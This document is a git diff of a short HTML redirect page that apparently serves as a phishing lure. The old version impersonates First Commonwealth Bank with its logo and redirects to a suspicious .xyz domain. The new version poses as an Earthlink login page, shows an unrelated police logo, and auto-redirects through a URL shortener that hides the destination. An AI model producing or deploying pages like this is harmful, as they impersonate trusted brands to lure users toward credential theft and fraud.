--- a/f-cw111.html
+++ b/f-cw111.html
@@ -2,11 +2,11 @@
 <html>
 <head>
 <title>Redirecting...</title>
-<meta http-equiv="refresh" content="2; url = https://disvreh.xyz/fcw" />
+<meta http-equiv="refresh" content="2; url = https://u.to/yjNIIg" />
 </head>
-<P>FIRST COMMONWEALTH BANK
+<P>Earthlink LOGIN
 <body>
-<img src="https://www.fcbanking.com/media/riuljjcf/logo-2023.png">
-<p>First Commonwealth Bank Login. PLEASE WAIT... Redirecting...</p>
+<img src="https://seeklogo.com/images/J/Jamaica_Constabulary_Force-logo-466E87E8EA-seeklogo.com.png">
+<p>Earthlink LOGIN. PLEASE WAIT... Redirecting...</p>
 </body>
 </html>
